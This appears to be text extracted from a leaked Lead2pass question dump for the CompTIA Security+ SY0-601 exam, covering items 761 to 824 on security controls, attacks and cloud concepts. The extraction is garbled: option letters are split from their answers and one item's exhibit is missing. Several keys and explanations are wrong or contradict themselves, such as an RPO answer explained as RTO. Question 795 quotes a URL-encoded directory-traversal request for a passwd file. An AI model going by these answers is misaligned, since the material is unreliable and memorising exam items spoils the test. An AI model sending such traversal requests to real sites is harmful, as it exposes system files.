A.
B.
C.
D.
internet
Screened Subnet
VLAN segmentation
Zero Trust
Answer: C
Explanation:
A flat network is a computer network design approach that aims to reduce cost, maintenance and
administration. Flat networks are designed to reduce the number of routers and switches on a
computer network by connecting the devices to a single switch instead of separate switches.
QUESTION 761
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
268
A security analyst is tasked with defining the "something you are" factor of the company's MFA
settings. Which of the following is BEST to use to complete the configuration?
A.
B.
C.
D.
Gait analysis
Vein
Soft token
HMAC-based, one-time password
Answer: B
QUESTION 762
A news article states hackers have been selling access to IoT camera feeds.
Which of the following is the Most likely reason for this issue?
A.
B.
C.
D.
Outdated software
Weak credentials
Lack of encryption
Backdoors
Answer: B
Explanation:
Most of the IoT devices have the same password given by the manufacturer. Weak credentials is
the most common point of attack.
QUESTION 763
Which of the following prevents an employee from seeing a colleague who is visiting an
inappropriate website?
A.
B.
C.
D.
Job roration policy
NDA
AUP
Separation of duties policy
Answer: C
Explanation:
In terms of enforcing an AUP in cyber security, internet management software ensures that highrisk websites are not visited on managed computers. Software for monitoring employee computer
use will provide you with tangible insights into the effectiveness of your acceptable use policies.
QUESTION 764
Which of the following techniques eliminates the use of rainbow tables for password cracking?
A.
B.
C.
D.
Hashing
Tokenization
Asymmetric encryption
Salting
Answer: D
Explanation:
Rainbow tables won’t work with salted hashes.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
269
QUESTION 765
A large financial services firm recently released information regarding a security breach within its
corporate network that began several years before. During the time frame in which the breach
occurred, indicators show an attacker gained administrative access to the network through a file
downloaded from a social media site and subsequently installed it without the user's knowledge.
Since the compromise, the attacker was able to take command and control the computer systems
anonymously while obtaining sensitive corporate and personal employee information. Which of
the following methods did the attacker MOST likely use to gain access?
A.
B.
C.
D.
A bot
A fileless virus
A logic bomb
A RAT
Answer: D
Explanation:
Remote access trojans (RATs) are malware designed to allow an attacker to remotely control an
infected computer. Once the RAT is running on a compromised system, the attacker can send
commands to it and receive data back in response.
QUESTION 766
A security analyst is receiving several alerts per user and is trying to determine If various logins
are malicious. The security analyst would like to create a baseline of normal operations and
reduce noise. Which of the following actions should the security analyst perform?
A.
B.
C.
D.
Adjust the data flow from authentication sources to the SIEM.
Disable email alerting and review the SIEM directly.
Adjust the sensitivity levels of the SIEM correlation engine.
Utilize behavioral analysis to enable the SIEM's learning mode.
Answer: D
Explanation:
UBA or User Behavior Analytics and is a threat detection analysis technology that uses AI to
understand how users normally behave and then find anomalous activities, which deviate from
their normal behavior and may be indicative of a threat.
For this scenario, the SIEM will first learn what is normal behavior then when a baseline is
created, it will know if any of the logins are malicious. Likely determined by when and where the
logins are occurring and if it's different from the baseline. This should hopefully reduce the
amount of alerts occurring.
QUESTION 767
Which of the following typically uses a combination of human and artificial intelligence to analyze
event data and take action without intervention?
A.
B.
C.
D.
TTP
OSINT
SOAR
SIEM
Answer: C
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
270
Explanation:
What is SOAR? SOAR collects data and alerts security teams using a centralized platform similar
to SIEM, but SIEM only sends alerts to security analysts. SOAR security, on the other hand,
takes it a step further by automating the responses. It uses artificial intelligence (AI) to learn
pattern behaviors, which enable it to predict similar threats before they happen. This makes it
easier for IT security staff to detect and address threats.
QUESTION 768
While preparing a software Inventory report, a security analyst discovers an unauthorized
program installed on most of the company's servers. The program utilizes the same code signing
certificate as an application deployed to only the accounting team.
Which of the following mitigations would BEST secure the server environment?
A.
B.
C.
D.
Revoke the code signing certificate used by both programs.
Block all unapproved file hashes from installation.
Add the accounting application file hash to the allowed list.
Update the code signing certificate for the approved application.
Answer: A
Explanation:
Revoke the code signing certificate: The fact that the unauthorized program is utilizing the same
code signing certificate as an application deployed to the accounting team suggests that the
certificate has been compromised. The analyst should revoke the certificate to prevent the
unauthorized program from executing.
QUESTION 769
A security analyst in a SOC has been tasked with onboarding a new network into the SIEM.
Which of the following BEST describes the information that should feed into a SIEM solution in
order to adequately support an investigation?
A.
B.
C.
D.
Logs from each device type and security layer to provide correlation of events
Only firewall logs since that is where attackers will most likely try to breach the network
Email and web-browsing logs because user behavior is often the cause of security breaches
NetFlow because it is much more reliable to analyze than syslog and will be exportable from
every device
Answer: A
Explanation:
SIEM needs massive amounts of information to be efficient.
QUESTION 770
Two hospitals merged into a single organization. The privacy officer requested a review of all
records to ensure encryption was used during record storage, in compliance with regulations.
During the review, the officer discovered thai medical diagnosis codes and patient names were
left unsecured. Which of the following types of data does this combination BEST represent?
A.
B.
C.
D.
Personal health information
Personally Identifiable Information
ToKenized data
Proprietary data
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
271
Answer: A
QUESTION 771
Which of the following is the MOST effective way to detect security flaws present on third-party
libraries embedded on software before it is released into production?
A.
B.
C.
D.
Employ different techniques for server- and client-side validations.
Use a different version control system for third-party libraries.
Implement a vulnerability scan to assess dependencies earlier on SDLC.
Increase the number of penetration tests before software release.
Answer: C
Explanation:
Implementing vulnerability scans allows for earlier detection and assessment of any potential
vulnerabilities, which can then be addressed accordingly.
QUESTION 772
A Chief Security Officer is looking for a solution that can reduce the occurrence of customers
receiving errors from back-end infrastructure when systems go offline unexpectedly. The security
architect would like the solution to help maintain session persistence. Which of the following
would BEST meet the requirements?
A.
B.
C.
D.
Reverse proxy
NIC teaming
Load balancer
Forward proxy
Answer: C
Explanation:
A load balancer can monitor the backend servers and direct traffic to working servers when other
servers go offline. It can also maintain session persistence, where a reverse proxy does not care
about session persistence.
QUESTION 773
Which of the following is a reason to publish files' hashes?
A.
B.
C.
D.
To validate the integrity of the files
To verify if the software was digitally signed
To use the hash as a software activation key
To use the hash as a decryption passphrase
Answer: A
Explanation:
To validate the integrity of the files - Hash function algorithms compares the file's original and
current hash values. And if a byte or even a piece of the file's data has been changed, the original
and current hash values will be different, and therefore you will know whether it's the same file or
not.
QUESTION 774
A company is moving its retail website to a public cloud provider. The company wants to tokenize
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
272
credit card data but not allow the cloud provider to see the stored credit card information. Which
of the following would BEST meet these objectives?
A.
B.
C.
D.
WAF
CASB
VPN
TLS
Answer: B
Explanation:
CASBs have become a vital part of enterprise security, allowing businesses to safely use the
cloud while protecting sensitive corporate data.
QUESTION 775
A technician was dispatched to complete repairs on a server in a data center. While locating the
server, the technician entered a restricted area without authorization. Which of the following
security controls would BEST prevent this in the future?
A.
B.
C.
D.
Use appropriate signage to mark all areas.
Utilize cameras monitored by guards.
Implement access control vestibules.
Enforce escorts to monitor all visitors.
Answer: C
Explanation:
An access control vestibule, or mantrap, is a physical access control system designed to prevent
unauthorized individuals from following authorized individuals into facilities with controlled access.
This question is asking for a way to prevent physical access to restricted area and this method
would address this.
QUESTION 776
A user wanted to catch up on some work over the weekend but had issues logging in to the
corporate network using a VPN. On Monday, the user opened a ticket for this issue but was able
to log in successfully. Which of the following BEST describes the policy that is being
implemented?
A.
B.
C.
D.
Time-based logins
Geofencing
Network location
Password history
Answer: A
Explanation:
Time-based logins: Time-of-day restrictions is an access control concept that limits when a user
account is able to log into a system or network. This is a tool and technique for limiting access to
sensitive environments to normal business hours, when oversight and monitoring can be
performed to prevent fraud, abuse, or intrusion. Time-of-day restrictions may also force logout on
an account after the authorized time period ends.
QUESTION 777
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
273
Several attempts have been made to pick the door lock of a secure facility. As a result, the
security engineer has been assigned to implement a stronger preventative access control. Which
of the following would BEST complete the engineer's assignment?
A.
B.
C.
D.
Replacing the traditional key with an RFID key
Installing and monitoring a camera facing the door
Setting motion-sensing lights to illuminate the door on activity
Surrounding the property with fencing and gates
Answer: A
Explanation:
Replacing the traditional key with an RFID key - For this question, there is mention of "attempts
have been made to pick the door lock". Out of the options provided, only the option to replace the
current door key with an RFID key directly addresses this issue. The other options can be viewed
as preventative access control systems/ deterrents as well.
Preventative access control - An access control that is used to stop unwanted or unauthorized
activity from occurring, these could be policies, firewalls, physical barriers etc.
RFID (Radio Frequency Identification) - A type of key card/fob access control system that uses a
radio frequency signals to communicate between a reader and an RFID tag. You would place the
tag/card near the reader and if the reader identifies the signal as belonging to an authorized user,
they will be allowed access.
QUESTION 778
A security analyst is evaluating the risks of authorizing multiple security solutions to collect data
from the company's cloud environment Which of the following is an immediate consequence of
these integrations?
A.
B.
C.
D.
Non-compliance with data sovereignty rules
Loss of the vendor's interoperability support
Mandatory deployment of a SIEM solution
Increase in the attack surface
Answer: D
Explanation:
While Non-compliance with data sovereignty rules is an implication of having multiple cloud
providers at DIFFERENT countries, this is not specified in the question, besides, they are security
solutions, which typically means they will not collect any kind of PII, PHI, SPI.
QUESTION 779
Security analysts notice a server login from a user who has been on vacation for two weeks. The
analysts confirm that the user did not log in to the system while on vacation. After reviewing
packet capture logs, the analysts notice the following:
Which of the following occurred?
A. A buffer overflow was exploited to gain unauthorized access
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
274
B. The user's account was compromised, and an attacker changed the login credentials
C. An attacker used a pass-the-hash attack to gain access
D. An insider threat with username smithJA logged in to the account
Answer: C
QUESTION 780
A company's security team received notice of a critical vulnerability affecting a high-profile device
within the web infrastructure. The vendor patch was just made available online but has not yet
been regression tested in development environments. In the interim, firewall rules were
implemented to reduce the access to the interface affected by the vulnerability. Which of the
following controls does this scenario describe?
A.
B.
C.
D.
Deterrent
Compensating
Detective
Preventive
Answer: B
Explanation:
Compensating control looks to be correct here. Open to correction however A compensating
control, also called an alternative control, is a mechanism that is put in place to satisfy the
requirement for a security measure that is deemed too difficult or impractical to implement at the
present time.
QUESTION 781
After a recent external audit, the compliance team provided a list of several non-compliant, inscope hosts that were not encrypting cardholder data at rest. Which of the following compliance
frameworks would address the compliance team's GREATEST concern?
A.
B.
C.
D.
PCI DSS
GDPR
ISO 27001
NIST CSF
Answer: A
QUESTION 782
Which of the following is used to ensure that evidence is admissible in legal proceedings when it
is collected and provided to the authorities?
A.
B.
C.
D.
Chain of custody
Legal hold
Event log
Artifacts
Answer: A
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
275
A chain of custody is a chronological paper trail documenting when, how, and by whom individual
items of physical or electronic evidence - such as cell phone logs - were collected, handled,
analyzed, or otherwise controlled during an investigation.
QUESTION 783
An analyst receives multiple alerts for beaconing activity for a host on the network, After
analyzing the activity, the analyst observes the following activity:
-
A user enters comptia.org into a web browser.
The website that appears is not the comptia.org site.
The website is a malicious site from the attacker.
Users in a different office are not having this issue.
Which of the following types of attacks was observed?
A.
B.
C.
D.
On-path attack
DNS poisoning
Locator (URL) redirection
Domain hijacking
Answer: B
Explanation:
Only some client have this problem about web tarns to malicious site.
QUESTION 784
A security analyst is tasked with classifying data to be stored on company servers. Which of the
following should be classified as proprietary?
A.
B.
C.
D.
Customers' dates of birth
Customers' email addresses
Marketing strategies
Employee salaries
Answer: C
Explanation:
Proprietary Information” shall mean information (whether now existing or hereafter created or
acquired) developed, created, or discovered by the Company, or which became known by, or was
conveyed to the Company, which has commercial value in the Company's business.
QUESTION 785
A security engineer is concerned about using an agent on devices that relies completely on
defined known-bad signatures. The security engineer wants to implement a tool with multiple
components including the ability to track, analyze, and monitor devices without reliance on
definitions alone. Which of the following solutions BEST fits this use case?
A.
B.
C.
D.
EDR
DLP
NGFW
HIPS
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
276
Explanation:
The acronym EDR stands for Endpoint Detection and Response and is also known as EDTR. It is
an endpoint security solution that is responsible for continuous monitoring of endpoints. This
permanent monitoring enables the technology to detect and respond to cyber threats such as
malware or ransomware at an early stage. The basis for this is always the analysis of contextrelated information, which can be used to make corrective proposals for recovery.
QUESTION 786
A security architect is required to deploy to conference rooms some workstations that will allow
sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored
in the conference rooms. The fiieshare is located in a local data center. Which of the following
should the security architect recommend to BEST meet the requirement?
A.
B.
C.
D.
Fog computing and KVMs
VDI and thin clients
Private cloud and DLP
Full drive encryption and thick clients
Answer: B
Explanation:
Virtual Desktop Infrastructure (VDI) is a technology that refers to the use of virtual machines to
provide and manage virtual desktops. VDI hosts desktop environments on a centralized server
and deploys them to end-users on request. VDI can be used to provide the desktop experience.
The computing hardware for VDI can be split into thin clients and thick clients:
- Thin clients are simple computers that can be accessed through a remote connection to a
central server which provides the client all of its resources. Thin clients do not have hard drives
so data isn't stored locally, and applications would also need to be accessed through a server.
Thin clients would work for this scenario since data can't be stored in the conference rooms and
thin clients cant store data anyway.
- Thick clients are fully functional networked computers that have their OS, local storage, and
handles their own processing. Just think company-provided desktop computers or laptops. They
can connect to a server if they want, but can work independently as well. Since files can be
stored locally on a thick client, they wouldn't work with the requirements of the scenario.
QUESTION 787
Which of the following should an organization consider implementing In the event executives
need to speak to the media after a publicized data breach?
A.
B.
C.
D.
Incident response plan
Business continuity plan
Communication plan
Disaster recovery plan
Answer: C
Explanation:
A communication plan is a policy-driven approach to providing company stakeholders with certain
information.
QUESTION 788
An analyst is reviewing logs associated with an attack. The logs indicate an attacker downloaded
a malicious file that was quarantined by the AV solution. The attacker utilized a local nonadministrative account to restore the malicious file to a new location. The file was then used by
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
277
another process to execute a payload. Which of the following attacks did the analyst observe?
A.
B.
C.
D.
Privilege escalation
Request forgeries
Injection
Replay attack
Answer: C
Explanation:
An injection attack is any exploitation that allows an attacker to submit code to a target system to
modify its operations and/or poison and corrupt its data set. This is also called remote code
attacks or remote code exploits.
QUESTION 789
The president of a regional bank likes to frequently provide SOC tours to potential investors.
Which of the following policies BEST reduces the risk of malicious activity occurring after a tour?
A.
B.
C.
D.
Password complexity
Acceptable use
Access control
Clean desk
Answer: D
Explanation:
A malicious investor would not be able to take advantage of anything gained until after the tour if
the swiped a USB, looked at or stole documents. If there was a clean desk policy then that would
prevent issues after a tour.
QUESTION 790
A security analyst has been tasked with finding the maximum amount of data loss that can occur
before ongoing business operations would be impacted.
Which of the following terms BEST defines this metric?
A.
B.
C.
D.
MTTR
RTO
RPO
MTBF
Answer: C
Explanation:
A recovery time objective (RTO) is the maximum tolerable length of time that a computer, system,
network or application can be down after a failure or disaster occurs. An RTO is measured in
seconds, minutes, hours or days. It is an important consideration in a disaster recovery plan
(DRP).
The amount of time that is used to determine the maximum a company can bear is directly linked
to the application and its impact on the business; any loss of data affects revenue-generating
activities. So, quantifying the impact of such losses will be a key factor in determining how to
configure the environment to achieve the desired RTOs.
QUESTION 791
Which of the following can be used by a monitoring tool to compare values and detect password
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
278
leaks without providing the actual credentials?
A.
B.
C.
D.
Hashing
Tokenization
Masking
Encryption
Answer: A
Explanation:
Hashing is used to assure the authenticity of websites with which they may share personal and
private information, in password storage applications (personal or used by entities they interact
with online), and is likely used by the antivirus solution they trust to keep their devices free of
malware." So if Hashing is used to validate the integrity of data, you can compare hashes to
figure out if the data (password or whatever it is) was compromised.
https://www.uscybersecurity.net/csmag/what-the-hash-data-integrity-and-authenticity-inamerican-jurisprudence/
QUESTION 792
An annual information security assessment has revealed that several OS-level configurations are
not in compliance due to outdated hardening standards the company is using. Which of the
following would be BEST to use to update and reconfigure the OS-level security configurations?
A.
B.
C.
D.
CIS benchmarks
GDPR guidance
Regional regulations
ISO 27001 standards
Answer: A
Explanation:
CIS Benchmarking -> CIS Benchmarks from the Center of Internet Security (CIS) are a set of
globally recognized and consensus-driven best practices to help security practitioners implement
and manage their cybersecurity defenses.
QUESTION 793
A company wants to simplify the certificate management process. The company has a single
domain with several dozen subdomains, all of which are publicly accessible on the internet.
Which of the following BEST describes the type of certificate the company should implement?
A.
B.
C.
D.
Subject alternative name
Wildcard
Self-signed
Domain validation
Answer: B
Explanation:
Wildcard SSL certificates are for a single domain and all its subdomains. A subdomain is under
the umbrella of the main domain. Usually subdomains will have an address that begins with
something other than 'www.'
For example, www.cloudflare.com has a number of subdomains, including blog.cloudflare.com,
support.cloudflare.com, and developers.cloudflare.com. Each is a subdomain under the main
cloudflare.com domain.
A single Wildcard SSL certificate can apply to all of these subdomains. Any subdomain will be
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
279
listed in the SSL certificate. Users can see a list of subdomains covered by a particular certificate
by clicking on the padlock in the URL bar of their browser, then clicking on "Certificate" (in
Chrome) to view the certificate's details.
https://www.cloudflare.com/learning/ssl/types-of-ssl-certificates/
QUESTION 794
Which of the following BEST describes when an organization utilizes a ready-to-use application
from a cloud provider?
A.
B.
C.
D.
laaS
SaaS
Paas
XaaS
Answer: B
Explanation:
SaaS, or software as a service, is on-demand access to ready-to-use, cloud-hosted application
software.
https://www.ibm.com/cloud/learn/iaas-paas-saas
QUESTION 795
A security analyst is reviewing web-application logs and finds the following log:
https://www.comptia.org/contact-us/%3Ffile%3D..%2F.A2F.A2Fescgs2Fpasswd
Which of the following attacks is being observed?
A.
B.
C.
D.
Directory traversal
XSS
CSRF
On-path attack
Answer: A
Explanation:
A common symptom of this attack is the presence of a variation of the change to parent directory
instruction (i.e., ../) in a URL, such as ..%c0%af or ..%5c.
QUESTION 796
Which of the following describes a social engineering technique that seeks to exploit a person's
sense of urgency?
A.
B.
C.
D.
A phishing email stating a cash settlement has been awarded but will expire soon
A smishing message stating a package is scheduled for pickup
A vishing call that requests a donation be made to a local charity
A SPIM notification claiming to be undercover law enforcement investigating a cybercrime
Answer: A
Explanation:
Phishing
As one of the most popular social engineering attack types, phishing scams are email and text
message campaigns aimed at creating a sense of urgency, curiosity or fear in victims. It then
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
280
prods them into revealing sensitive information, clicking on links to malicious websites, or opening
attachments that contain malware.
https://www.imperva.com/learn/application-security/social-engineeringattack/#:~:text=Phishing,curiosity%20or%20fear%20in%20victims.
QUESTION 797
An organization just implemented a new security system. Local laws state that citizens must be
notified prior to encountering the detection mechanism to deter malicious activities. Which of the
following is being implemented?
A.
B.
C.
D.
Proximity cards with guards
Fence with electricity
Drones with alarms
Motion sensors with signage
Answer: D
Explanation:
Signage is a deterrent. Motion sensors are detective.
QUESTION 798
Which of the following is a targeted attack aimed at compromising users within a specific industry
or group?
A.
B.
C.
D.
Watering hole
Typosquatting
Hoax
Impersonation
Answer: A
Explanation:
A watering hole attack is a targeted attack designed to compromise users within a specific
industry or group of users by infecting websites they typically visit and luring them to a malicious
site.
QUESTION 799
Which of the following documents provides guidance regarding the recommended deployment of
network security systems from the manufacturer?
A.
B.
C.
D.
Cloud control matrix
Reference architecture
NIST RMF
CIS Top 20
Answer: C
QUESTION 800
Users are presented with a banner upon each login to a workstation. The banner mentions that
users are not entitled to any reasonable expectation of privacy and access is for authorized
personnel only. In order to proceed past that banner. users must click the OK button. Which of
the following is this an example of?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
281
A.
B.
C.
D.
AUP
NDA
SLA
MOU
Answer: A
Explanation:
An acceptable use policy (AUP) is a document that outlines the rules and restrictions employees
must follow in regard to the company's network, software, internet connection and devices.
QUESTION 801
Which of the following is the BEST action to foster a consistent and auditable incident response
process?
A.
B.
C.
D.
Incent new hires to constantly update the document with external knowledge.
Publish the document in a central repository that is easily accessible to the organization.
Restrict eligibility to comment on the process to subject matter experts of each IT silo.
Rotate CIRT members to foster a shared responsibility model in the organization.
Answer: D
Explanation:
NIST SP 800-137 under Computer Incident Response Team (CIRT).
QUESTION 802
A user reports falling for a phishing email to an analyst. Which of the following system logs would
the analyst check FIRST?
A.
B.
C.
D.
DNS
Message gateway
Network
Authentication
Answer: B
Explanation:
You have to check message gateway to understand the original source of the message as well as
the intended recipients.
QUESTION 803
A penetration tester is fuzzing an application to identify where the EIP of the stack is located on
memory. Which of the following attacks is the penetration tester planning to execute?
A.
B.
C.
D.
Race-condition
Pass-the-hash
Buffer overflow
XSS
Answer: C
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
282
A buffer overflow (or buffer overrun) occurs when the volume of data exceeds the storage
capacity of the memory buffer. As a result, the program attempting to write the data to the buffer
overwrites adjacent memory locations.
QUESTION 804
A user forwarded a suspicious email to the security team, Upon investigation, a malicious URL
was discovered. Which of the following should be done FIRST to prevent other users from
accessing the malicious URL?
A.
B.
C.
D.
Configure the web content filter for the web address.
Report the website to threat intelligence partners
Set me SIEM to alert for any activity to the web address.
Send out a corporate communication to warn all users Of the malicious email.
Answer: A
Explanation:
Web content filtering is the practice of blocking access to web content that may be deemed
offensive, inappropriate, or even dangerous. Better to just block out the URL since we already
know its malicious now and notify later since you don't know how many other people received the
email.
QUESTION 805
Which of the following in the incident response process is the BEST approach to improve the
speed of the identification phase?
A.
B.
C.
D.
Activate verbose logging in all critical assets.
Tune monitoring in order to reduce false positive rates.
Redirect all events to multiple syslog servers.
Increase the number of sensors present on the environment.
Answer: B
Explanation:
In the incident response process the identification phase is used to recognize whether an event
that occurs should be classified as an incident. There for false positive tuning would increase the
identification time.
QUESTION 806
An attacker has determined the best way to impact operations is to infiltrate third-party software
vendors. Which of the following vectors is being exploited?
A.
B.
C.
D.
Social media
Cloud
Supply chain
Social engineering
Answer: C
Explanation:
Supply chain attacks are an emerging kind of threat that target software developers and
suppliers. The goal is to access source codes, build processes, or update mechanisms by
infecting legitimate apps to distribute malware.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
283
QUESTION 807
Which of the following concepts BEST describes tracking and documenting changes to software
and managing access to files and systems?
A.
B.
C.
D.
Version control
Continuous monitoring
Stored procedures
Automation
Answer: A
Explanation:
Version control, also known as source control, is the process of tracking and managing changes
to files over time. VCS -- version control systems -- are software tools designed to help teams
work in parallel.
https://www.perforce.com/blog/vcs/what-is-version-control
QUESTION 808
Which of the following controls is used to make an organization initially aware of a data
compromise?
A.
B.
C.
D.
Protective
Preventative
Corrective
Detective
Answer: D
Explanation:
Detective control identifies security events that have already occurred. Intrusion detection
systems are detective controls.
Preventative Controls - acts to eliminate or reduce the likelihood that an attack can succeed. A
preventative control operates before an attack can take place. They are comparing the
configurations to a secure guideline to ensure no gaps. Meaning they are pre-emptively
hardening their systems against future attack vectors.
Corrective Controls - controls that remediate security issues that have already occurred.
Restoring backups after a ransomware attack is an example of a corrective control.
QUESTION 809
A vulnerability has been discovered and a known patch to address the vulnerability does not
exist. Which of the following controls works BEST until a proper fix is released?
A.
B.
C.
D.
Detective
Compensating
Deterrent
Corrective
Answer: B
Explanation:
It will be necessary to lift new security controls until the patch is available, so it is acceptable.
QUESTION 810
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
284
A company wants to build a new website to sell products online. The website will host a storefront
application that will allow visitors to add products to a shopping cart and pay for the products
using a credit card. Which of the following protocols would be the MOST secure to implement?
A.
B.
C.
D.
SSL
FTP
SNMP
TLS
Answer: D
Explanation:
Transport Layer Security (TLS) is the successor protocol to SSL. TLS is an improved version of
SSL. It works in much the same way as the SSL, using encryption to protect the transfer of data
and information. The two terms are often used interchangeably in the industry although SSL is
still widely used.
QUESTION 811
Which of the following is the FIRST environment in which proper, secure coding should be
practiced?
A.
B.
C.
D.
Stage
Development
Production
Test
Answer: B
Explanation:
The developer has to start writing secure code from beginning itself. Which will then be tested,
staged and finally production.
QUESTION 812
A company is under investigation for possible fraud. As part of the investigation. the authorities
need to review all emails and ensure data is not deleted.
Which of the following should the company implement to assist in the investigation?
A.
B.
C.
D.
Legal hold
Chain of custody
Data loss prevention
Content filter
Answer: A
Explanation:
Once an organization is aware that it needs to preserve evidence for a court case, it must do so.
The mechanism is fairly simple as well: once you realize your organization needs to preserve
evidence, you must use a legal hold, or litigation hold, which is the process by which you properly
preserve any and all digital evidence related to a potential case.
QUESTION 813
The new Chief Information Security Officer at a company has asked the security team to
implement stronger user account policies. The new policies require:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
285
- Users to choose a password unique to their last ten passwords
- Users to not log in from certain high risk countries
Which of the following should the security team implement? (Choose two.)
A.
B.
C.
D.
E.
F.
Password complexity
Password history
Geolocation
Geofencing
Geotagging
Password reuse
Answer: BD
Explanation:
Password history - Number of unique passwords that must be used before an user can re-use his
old password.
Geolocation is the technology used to perform Geofencing. And to actually restrict logins from
certain locations you would use geofencing.
QUESTION 814
Which of the following secure application development concepts aims to block verbose error
messages from being shown in a user's interface?
A.
B.
C.
D.
OWASP
Obfuscation/camouflage
Test environment
Prevention of information exposure
Answer: D
Explanation:
Prevention of information exposure. This concept focuses on ensuring that sensitive information,
such as stack traces, debug output, and detailed error messages, are not disclosed to
unauthorized parties through the user interface.
QUESTION 815
Which of the following is the MOST likely reason for securing an air gapped laboratory HVAC
system?
A.
B.
C.
D.
To avoid data leakage
To protect surveillance logs
To ensure availability
To facilitate third party access
Answer: A
QUESTION 816
An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security
analyst determines the certificate is signed properly and is a valid wildcard. This same certificate
is installed on the other company servers without issue. Which of the following is the MOST likely
reason for this finding?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
286
A.
B.
C.
D.
The required intermediate certificate is not loaded as part of the certificate chain.
The certificate is on the CRL and is no longer valid.
The corporate CA has expired on every server, causing the certificate to fail verification.
The scanner is incorrectly configured to not trust this certificate when detected on the server.
Answer: A
Explanation:
Most of the time the scanning engine will require a root CA certificate (if needed) to get more
accurate results in regards to the scan. If a root CA certificate is not provided and a SSL
certificate is located on a server, the result will be that is "untrusted" so we have to load the root
one and the warning will disappear.
QUESTION 817
Which of the following supplies non-repudiation during a forensics investigation?
A.
B.
C.
D.
E.
Dumping volatile memory contents first
Duplicating a drive with dd
Using a SHA 2 signature of a drive image
Logging everyone in contact with evidence
Encrypting sensitive data
Answer: C
Explanation:
Nonrepudiation is specifically talking about the proof that someone has done something on the
system. Taking a hash of the original disk is proof that it represents the state of the data when the
investigation began. It’s not a signature in the sense of an encryption cert or something like that,
but it is definitely a method of ensuring that the data on the drive represents the user’s changes,
vice those of the investigator or someone else after the fact. Chain of custody doesn’t apply
because nonrepudiation is talking about the data itself.
QUESTION 818
Which of the following uses SAML for authentication?
A.
B.
C.
D.
TOTP
Federation
Kerberos
HOTP
Answer: B
Explanation:
Federation, or identity federation, defines policies, protocols, and practices to manage identities
across systems and organizations. Federation’s ultimate goal is to allow users to seamlessly
access data or systems across domains. Federation is enabled through the use of industry
standards such as Security Assertion Markup Language (SAML).
QUESTION 819
Which of the following processes will eliminate data using a method that will allow the storage
device to be reused after the process is complete?
A. Pulverizing
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
287
B. Overwriting
C. Shredding
D. Degaussing
Answer: B
QUESTION 820
A company discovered that terabytes of data have been exfiltrated over the past year after an
employee clicked on an email link. The threat continued to evolve and remain undetected until a
security analyst noticed an abnormal amount of external connections when the employee was not
working. Which of the following is the MOST likely threat actor?
A.
B.
C.
D.
Shadow IT
Script kiddies
APT
Insider threat
Answer: C
Explanation:
An APT attack is characterized by using toolkits to achieve a presence on a target network and
then, instead of just moving to steal information, focusing on the long game by maintaining a
persistent presence on the target network. The tactics, tools, and procedures of APTs are
focused on maintaining administrative access to the target network and avoiding detection. Then,
over the long haul, the attacker can remove intellectual property and more from the organization,
typically undetected.
QUESTION 821
An organization is planning to roll out a new mobile device policy and issue each employee a new
laptop. These laptops would access the users' corporate operating system remotely and allow
them to use the laptops for purposes outside of their job roles. Which of the following deployment
models is being utilized?
A.
B.
C.
D.
MDM and application management
BYOO and containers
COPE and VDI
CYOD and VMs
Answer: C
Explanation:
Bring your own device (BYOD) - the mobile device is owned by the employee. The mobile will
have to meet whatever profile is required by the company (in terms of OS version and
functionality) and the employee will have to agree on the installation of corporate apps and to
some level of oversight and auditing. This model is usually the most popular with employees but
poses the most difficulties for security and network managers.
Corporate owned, business only (COBO) - the device is the property of the company and may
only be used for company business.
Corporate owned, personally-enabled (COPE) - the device is chosen and supplied by the
company and remains its property. The employee may use it to access personal email and social
media accounts and for personal web browsing (subject to whatever acceptable use policies are
in force).
Choose your own device (CYOD) - much the same as COPE but the employee is given a choice
of device from a list.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
288
QUESTION 822
A Chief Security Officer is looking for a solution that can provide increased scalability and
flexibility for back-end infrastructure, allowing it to be updated and modified without disruption to
services. The security architect would like the solution selected to reduce the back-end server
resources and has highlighted that session persistence is not important for the applications
running on the back-end servers. Which of the following would BEST meet the requirements?
A.
B.
C.
D.
Reverse proxy
Automated patch management
Snapshots
NIC teaming
Answer: A
Explanation:
In computer networks, a reverse proxy is the application that sits in front of back-end applications
and forwards client requests to those applications. Reverse proxies help increase scalability,
performance, resilience and security.
QUESTION 823
A recent phishing campaign resulted in several compromised user accounts. The security
incident response team has been tasked with reducing the manual labor of filtering through all the
phishing emails as they arrive and blocking the sender's email address, along with other time
consuming mitigation actions. Which of the following can be configured to streamline those
tasks?
A.
B.
C.
D.
E.
SOAR playbook
MOM policy
Firewall rules
URL filter
SIEM data collection
Answer: A
Explanation:
SOAR playbooks are used to automate key functions of a SOC based on processes documented
in the incident response playbooks.
QUESTION 824
Which of the following is a security best practice that ensures the integrity of aggregated log files
within a SIEM?
